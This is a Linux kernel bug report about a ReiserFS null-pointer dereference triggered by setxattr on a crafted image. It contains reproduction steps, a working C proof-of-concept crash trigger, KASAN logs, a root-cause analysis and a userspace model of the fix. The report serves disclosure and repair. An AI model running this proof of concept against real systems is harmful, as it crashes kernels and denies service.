[Bug 200357] New: nullptr dereference in reiserfs_get_block() when calling setxattr() on a file in a reiserfs image

https://bugzilla.kernel.org/show_bug.cgi?id=200357

            Bug ID: 200357
           Summary: nullptr dereference in reiserfs_get_block() when
                    calling setxattr() on a file in a reiserfs image
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ReiserFS
          Assignee: reiserfs-devel@xxxxxxxxxxxxxxx
          Reporter: wen.xu@xxxxxxxxxx
        Regression: No

Created attachment 277011
  --> https://bugzilla.kernel.org/attachment.cgi?id=277011&action=edit
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 254.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {
  char *xattr;
  int err;

  /* Path of the target file inside the mounted crafted image */
  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);
  if (err < 0)
    error(1, errno, "asprintf");

  // xattr: a 113-byte zero-filled value, created rather than replaced
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE) < 0)
    perror("setxattr");

  free(xattr);
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}

- Kernel message
[  222.219838] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  222.219960] REISERFS (device loop0): using ordered data mode
[  222.219973] reiserfs: using flush barriers
[  222.221188] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  222.222249] REISERFS (device loop0): checking transaction log (loop0)
[  223.239558] REISERFS (device loop0): Using r5 hash to sort names
[  223.239924] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage.
[  233.095836] ==================================================================
[  233.097426] BUG: KASAN: null-ptr-deref in reiserfs_get_block+0x8ca/0x1c40
[  233.098817] Write of size 4 at addr 000000000000000c by task a.out/1363

[  233.100495] CPU: 0 PID: 1363 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  233.100507] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  233.100516] Call Trace:
[  233.100536]  dump_stack+0x7b/0xb5
[  233.100549]  kasan_report+0x10c/0x390
[  233.100554]  ? reiserfs_get_block+0x8ca/0x1c40
[  233.100563]  __asan_store4+0x7b/0x80
[  233.100567]  reiserfs_get_block+0x8ca/0x1c40
[  233.100574]  ? reiserfs_commit_write+0x390/0x390
[  233.100577]  ? kasan_kmalloc+0xad/0xe0
[  233.100584]  ? memcg_kmem_put_cache+0x1b/0xa0
[  233.100589]  ? kmem_cache_alloc+0x17c/0x1e0
[  233.100597]  ? alloc_buffer_head+0x20/0x70
[  233.100603]  ? create_empty_buffers+0x17e/0x1d0
[  233.100607]  ? memset+0x31/0x40
[  233.100619]  ? unlock_page+0x16/0x40
[  233.100624]  ? block_read_full_page+0x28f/0x4d0
[  233.100628]  ? reiserfs_commit_write+0x390/0x390
[  233.100636]  ? mark_page_accessed+0x133/0x200
[  233.100640]  __block_write_begin_int+0x296/0x940
[  233.100644]  ? __block_write_begin_int+0x296/0x940
[  233.100649]  ? reiserfs_commit_write+0x390/0x390
[  233.100654]  ? __breadahead+0xd0/0xd0
[  233.100665]  ? mutex_lock+0x99/0xf0
[  233.100670]  ? __mutex_lock_slowpath+0x20/0x20
[  233.100675]  ? kasan_check_write+0x14/0x20
[  233.100680]  __block_write_begin+0x11/0x20
[  233.100684]  __reiserfs_write_begin+0x162/0x2a0
[  233.100694]  reiserfs_xattr_set_handle+0x283/0x610
[  233.100699]  ? reiserfs_chown_xattrs+0x60/0x60
[  233.100704]  ? kasan_check_read+0x11/0x20
[  233.100708]  ? mutex_lock+0x99/0xf0
[  233.100712]  ? __mutex_lock_slowpath+0x20/0x20
[  233.100725]  ? do_syscall_64+0x78/0x170
[  233.100731]  ? kasan_check_write+0x14/0x20
[  233.100736]  reiserfs_xattr_set+0x1f8/0x2f0
[  233.100741]  ? reiserfs_xattr_set_handle+0x610/0x610
[  233.100748]  ? strlen+0x25/0x40
[  233.100752]  user_set+0x83/0xa0
[  233.100758]  __vfs_setxattr+0x7c/0xa0
[  233.100763]  __vfs_setxattr_noperm+0x8d/0x200
[  233.100768]  vfs_setxattr+0xb3/0xc0
[  233.100772]  setxattr+0x1b3/0x260
[  233.100776]  ? vfs_setxattr+0xc0/0xc0
[  233.100781]  ? filename_lookup+0x191/0x280
[  233.100785]  ? filename_parentat+0x2b0/0x2b0
[  233.100790]  ? kasan_kmalloc+0xad/0xe0
[  233.100795]  ? kasan_check_write+0x14/0x20
[  233.100807]  ? strncpy_from_user+0xa8/0x1c0
[  233.100815]  ? __mnt_is_readonly.part.13+0x23/0x30
[  233.100820]  ? __mnt_want_write+0x9d/0xb0
[  233.100824]  path_setxattr+0x134/0x170
[  233.100829]  ? setxattr+0x260/0x260
[  233.100834]  ? vm_brk+0x20/0x20
[  233.100839]  __x64_sys_setxattr+0x6d/0x80
[  233.100844]  do_syscall_64+0x78/0x170
[  233.100851]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  233.100868] RIP: 0033:0x7fba989c81fa
[  233.100870] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  233.100932] RSP: 002b:00007fffa6feac58 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  233.100937] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fba989c81fa
[  233.100940] RDX: 00007fffa6feac80 RSI: 00000000004007a5 RDI: 000000000257a080
[  233.100942] RBP: 00007fffa6fead00 R08: 0000000000000001 R09: 0000000000000000
[  233.100945] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400550
[  233.100947] R13: 00007fffa6feae00 R14: 0000000000000000 R15: 0000000000000000
[  233.100952] ==================================================================
[  233.102525] Disabling lock debugging due to kernel taint
[  233.103135] BUG: unable to handle kernel NULL pointer dereference at 000000000000000c
[  233.104712] PGD 80000001f3a5b067 P4D 80000001f3a5b067 PUD 1f02cb067 PMD 0
[  233.106096] Oops: 0002 [#1] SMP KASAN PTI
[  233.106910] CPU: 0 PID: 1363 Comm: a.out Tainted: G    B             4.18.0-rc1+ #8
[  233.108426] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  233.110308] RIP: 0010:reiserfs_get_block+0x8d1/0x1c40
[  233.111308] Code: 00 00 48 3b 9d f8 fc ff ff 0f 87 df 06 00 00 4d 8d 6c 9c fc 44 8b bd 50 fd ff ff 4c 89 ef e8 36 9b eb ff 48 8b bd 28 fd ff ff <45> 89 7d 00 e8 a6 9b eb ff 48 8b bd 20 fd ff ff 4d 8b 6e 28 e8 96
[  233.115052] RSP: 0018:ffff8801efca73a0 EFLAGS: 00010296
[  233.116097] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  233.117519] RDX: 0000000000000000 RSI: 0000000000000297 RDI: ffff8801d06d9608
[  233.118925] RBP: ffff8801efca7720 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  233.120334] R10: 0000000000000001 R11: ffffed003edc3eba R12: 0000000000000010
[  233.121758] R13: 000000000000000c R14: ffff8801d06d95e0 R15: 0000000000002910
[  233.123162] FS:  00007fba98ea7700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  233.124750] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  233.125898] CR2: 000000000000000c CR3: 00000001f029a000 CR4: 00000000000006f0
[  233.127310] Call Trace:
[  233.127825]  ? reiserfs_commit_write+0x390/0x390
[  233.128751]  ? kasan_kmalloc+0xad/0xe0
[  233.129517]  ? memcg_kmem_put_cache+0x1b/0xa0
[  233.130390]  ? kmem_cache_alloc+0x17c/0x1e0
[  233.131234]  ? alloc_buffer_head+0x20/0x70
[  233.132066]  ? create_empty_buffers+0x17e/0x1d0
[  233.132977]  ? memset+0x31/0x40
[  233.133632]  ? unlock_page+0x16/0x40
[  233.134355]  ? block_read_full_page+0x28f/0x4d0
[  233.135264]  ? reiserfs_commit_write+0x390/0x390
[  233.136194]  ? mark_page_accessed+0x133/0x200
[  233.137072]  __block_write_begin_int+0x296/0x940
[  233.138015]  ? __block_write_begin_int+0x296/0x940
[  233.138982]  ? reiserfs_commit_write+0x390/0x390
[  233.139907]  ? __breadahead+0xd0/0xd0
[  233.140646]  ? mutex_lock+0x99/0xf0
[  233.141352]  ? __mutex_lock_slowpath+0x20/0x20
[  233.142257]  ? kasan_check_write+0x14/0x20
[  233.143081]  __block_write_begin+0x11/0x20
[  233.143904]  __reiserfs_write_begin+0x162/0x2a0
[  233.144813]  reiserfs_xattr_set_handle+0x283/0x610
[  233.145788]  ? reiserfs_chown_xattrs+0x60/0x60
[  233.146678]  ? kasan_check_read+0x11/0x20
[  233.147485]  ? mutex_lock+0x99/0xf0
[  233.148192]  ? __mutex_lock_slowpath+0x20/0x20
[  233.149084]  ? do_syscall_64+0x78/0x170
[  233.149871]  ? kasan_check_write+0x14/0x20
[  233.150696]  reiserfs_xattr_set+0x1f8/0x2f0
[  233.151541]  ? reiserfs_xattr_set_handle+0x610/0x610
[  233.152538]  ? strlen+0x25/0x40
[  233.153179]  user_set+0x83/0xa0
[  233.153830]  __vfs_setxattr+0x7c/0xa0
[  233.154570]  __vfs_setxattr_noperm+0x8d/0x200
[  233.155443]  vfs_setxattr+0xb3/0xc0
[  233.156148]  setxattr+0x1b3/0x260
[  233.156820]  ? vfs_setxattr+0xc0/0xc0
[  233.157570]  ? filename_lookup+0x191/0x280
[  233.158390]  ? filename_parentat+0x2b0/0x2b0
[  233.159249]  ? kasan_kmalloc+0xad/0xe0
[  233.160005]  ? kasan_check_write+0x14/0x20
[  233.160831]  ? strncpy_from_user+0xa8/0x1c0
[  233.161689]  ? __mnt_is_readonly.part.13+0x23/0x30
[  233.162649]  ? __mnt_want_write+0x9d/0xb0
[  233.163458]  path_setxattr+0x134/0x170
[  233.164219]  ? setxattr+0x260/0x260
[  233.164924]  ? vm_brk+0x20/0x20
[  233.165579]  __x64_sys_setxattr+0x6d/0x80
[  233.166393]  do_syscall_64+0x78/0x170
[  233.167133]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  233.168137] RIP: 0033:0x7fba989c81fa
[  233.168855] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  233.172610] RSP: 002b:00007fffa6feac58 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  233.174125] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fba989c81fa
[  233.175542] RDX: 00007fffa6feac80 RSI: 00000000004007a5 RDI: 000000000257a080
[  233.176957] RBP: 00007fffa6fead00 R08: 0000000000000001 R09: 0000000000000000
[  233.178376] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400550
[  233.179786] R13: 00007fffa6feae00 R14: 0000000000000000 R15: 0000000000000000
[  233.181196] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  233.190821] CR2: 000000000000000c
[  233.191568] ---[ end trace 2e85051acb5f6dc1 ]---
[  233.192549] RIP: 0010:reiserfs_get_block+0x8d1/0x1c40
[  233.193590] Code: 00 00 48 3b 9d f8 fc ff ff 0f 87 df 06 00 00 4d 8d 6c 9c fc 44 8b bd 50 fd ff ff 4c 89 ef e8 36 9b eb ff 48 8b bd 28 fd ff ff <45> 89 7d 00 e8 a6 9b eb ff 48 8b bd 20 fd ff ff 4d 8b 6e 28 e8 96
[  233.197452] RSP: 0018:ffff8801efca73a0 EFLAGS: 00010296
[  233.198563] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  233.200142] RDX: 0000000000000000 RSI: 0000000000000297 RDI: ffff8801d06d9608
[  233.201590] RBP: ffff8801efca7720 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  233.203362] R10: 0000000000000001 R11: ffffed003edc3eba R12: 0000000000000010
[  233.204873] R13: 000000000000000c R14: ffff8801d06d95e0 R15: 0000000000002910
[  233.206338] FS:  00007fba98ea7700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  233.207957] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  233.209154] CR2: 000000000000000c CR3: 00000001f029a000 CR4: 00000000000006f0

- Reason
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1047
    if (blocks_needed == 1) {
        un = &unf_single;
    } else {
        un = kcalloc(min(blocks_needed, max_to_insert),
                     UNFM_P_SIZE, GFP_NOFS);
        if (!un) {
            un = &unf_single;
            blocks_needed = 1;
            max_to_insert = 0;
        }
    }
    if (blocks_needed <= max_to_insert) {
        /*
         * we are going to add target block to
         * the file. Use allocated block for that
         */
        un[blocks_needed - 1] =
            cpu_to_le32(allocated_block_nr);
Since the size passed to kcalloc, `min(blocks_needed, max_to_insert)`, can be 0,
kcalloc returns ZERO_SIZE_PTR (0x10) rather than NULL, so the `if (!un)`
fallback is not taken and `un` is left as 0x10. The kernel then faults on the
write to `un[blocks_needed - 1]` (the KASAN report above shows a 4-byte write at
address 0xc).
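The following is an added userspace model of the failure pattern described above; it is example code written for this page, not the reiserfs code or any kernel patch. It assumes the kernel allocator contract that a zero-byte kmalloc()/kcalloc() returns ZERO_SIZE_PTR ((void *)16) instead of NULL and that ZERO_OR_NULL_PTR() is the check that recognises both cases; mock_kcalloc, mock_kfree, unsafe_target_addr and safe_store are names invented for the example. unsafe_target_addr mirrors the quoted allocation logic and computes (without performing) the store address, showing how blocks_needed == 0 turns 0x10 into 0xc; safe_store shows the two checks a defender would add: reject a block count that cannot index the array, and treat a zero-size allocation like a failed one.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed allocator contract (matches the kernel's ZERO_SIZE_PTR definition):
 * a zero-byte request yields (void *)16, which is not NULL. */
#define ZERO_SIZE_PTR ((void *)16)
#define ZERO_OR_NULL_PTR(p) ((uintptr_t)(p) <= (uintptr_t)ZERO_SIZE_PTR)

#define UNFM_P_SIZE 4   /* size of one on-disk unformatted-node pointer */

/* Userspace stand-in for kcalloc(): zero-size requests return ZERO_SIZE_PTR. */
static void *mock_kcalloc(size_t n, size_t size)
{
    if (n == 0 || size == 0)
        return ZERO_SIZE_PTR;
    return calloc(n, size);
}

/* Userspace stand-in for kfree(): NULL and ZERO_SIZE_PTR are no-ops. */
static void mock_kfree(void *p)
{
    if (!ZERO_OR_NULL_PTR(p))
        free(p);
}

static size_t min_sz(size_t a, size_t b) { return a < b ? a : b; }

/* Mirrors the quoted logic and returns the address that un[blocks_needed - 1]
 * would be written to, without writing. With blocks_needed == 0 the kcalloc
 * size is 0, un becomes ZERO_SIZE_PTR, the !un fallback is skipped, and the
 * target is 0x10 - 4 == 0xc, the address in the report. */
static uintptr_t unsafe_target_addr(int blocks_needed, int max_to_insert)
{
    uint32_t unf_single = 0;
    uint32_t *un;
    int allocated = 0;
    uintptr_t target;

    if (blocks_needed == 1) {
        un = &unf_single;
    } else {
        un = mock_kcalloc(min_sz((size_t)blocks_needed, (size_t)max_to_insert),
                          UNFM_P_SIZE);
        allocated = 1;
        if (!un) {              /* never true for ZERO_SIZE_PTR */
            un = &unf_single;
            allocated = 0;
            blocks_needed = 1;
        }
    }
    target = (uintptr_t)un + (uintptr_t)(blocks_needed - 1) * UNFM_P_SIZE;
    if (allocated)
        mock_kfree(un);
    return target;
}

/* Hardened variant (only the "block fits" path is modelled): validate the
 * index before allocating and recognise a zero-size allocation. Returns the
 * value stored, or a negative errno. */
static int64_t safe_store(int blocks_needed, int max_to_insert, uint32_t block_nr)
{
    uint32_t unf_single = 0;
    uint32_t *un;
    int allocated = 0;
    int64_t ret;

    if (blocks_needed < 1 || blocks_needed > max_to_insert)
        return -EINVAL;         /* un[blocks_needed - 1] must be in bounds */

    if (blocks_needed == 1) {
        un = &unf_single;
    } else {
        un = mock_kcalloc((size_t)blocks_needed, UNFM_P_SIZE);
        if (ZERO_OR_NULL_PTR(un))
            return -ENOMEM;     /* catches NULL and ZERO_SIZE_PTR alike */
        allocated = 1;
    }
    un[blocks_needed - 1] = block_nr;
    ret = un[blocks_needed - 1];
    if (allocated)
        mock_kfree(un);
    return ret;
}

int main(void)
{
    printf("unsafe target for blocks_needed=0: %#lx\n",
           (unsigned long)unsafe_target_addr(0, 8));
    printf("safe_store(0, 8, 42) = %lld\n", (long long)safe_store(0, 8, 42));
    printf("safe_store(3, 8, 42) = %lld\n", (long long)safe_store(3, 8, 42));
    return 0;
}
```

The point the model makes is that a plain NULL check after a kernel allocation whose size comes from on-disk data is not a bounds check: a size of 0 is "successfully" allocated, and the resulting pointer is only caught by ZERO_OR_NULL_PTR() or, better, by validating the count before the allocation is attempted.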

Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech.



